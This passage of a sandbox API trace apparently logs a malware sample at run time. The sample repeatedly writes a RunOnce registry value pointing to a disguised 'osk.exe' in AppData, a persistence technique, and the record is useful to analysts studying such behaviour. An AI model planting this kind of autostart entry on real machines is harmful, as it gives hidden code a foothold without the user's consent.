riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.219] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 [0082.219] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.219] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x67 [0082.219] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.220] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 [0082.220] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.220] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.221] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.221] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.221] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.221] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.221] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.221] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.221] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.221] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.221] RegCloseKey (hKey=0x280) returned 0x0 [0082.221] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.222] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.222] SetTimer (hWnd=0x20280, nIDEvent=0x20e2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e2 [0082.222] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.233] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.233] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.233] KillTimer (hWnd=0x20280, uIDEvent=0x20e2) returned 1 [0082.234] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.234] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.234] IUnknown:Release (This=0x787518) returned 0x1 [0082.234] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.234] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.234] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.234] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.234] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.235] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.235] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.235] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.235] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.235] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0082.235] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.235] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x68 [0082.235] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.236] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x67 [0082.236] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.236] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.236] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.236] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.236] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.236] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.236] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.237] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.237] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.237] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.237] RegCloseKey (hKey=0x280) returned 0x0 [0082.237] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.237] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.237] SetTimer (hWnd=0x20280, nIDEvent=0x20e3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e3 [0082.238] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.249] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.249] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.249] KillTimer (hWnd=0x20280, uIDEvent=0x20e3) returned 1 [0082.250] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.250] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.250] IUnknown:Release (This=0x787518) returned 0x1 [0082.250] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.250] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.250] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.250] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.251] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.251] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.251] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0082.251] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.251] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x69 [0082.251] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.252] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0082.252] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.252] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.252] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.252] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.252] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.252] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.252] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.252] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.253] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.253] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.253] RegCloseKey (hKey=0x280) returned 0x0 [0082.253] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.253] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.253] SetTimer (hWnd=0x20280, nIDEvent=0x20e4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e4 [0082.253] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.264] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.264] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.264] KillTimer (hWnd=0x20280, uIDEvent=0x20e4) returned 1 [0082.265] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.265] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.265] IUnknown:Release (This=0x787518) returned 0x1 [0082.265] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.265] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.265] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.265] 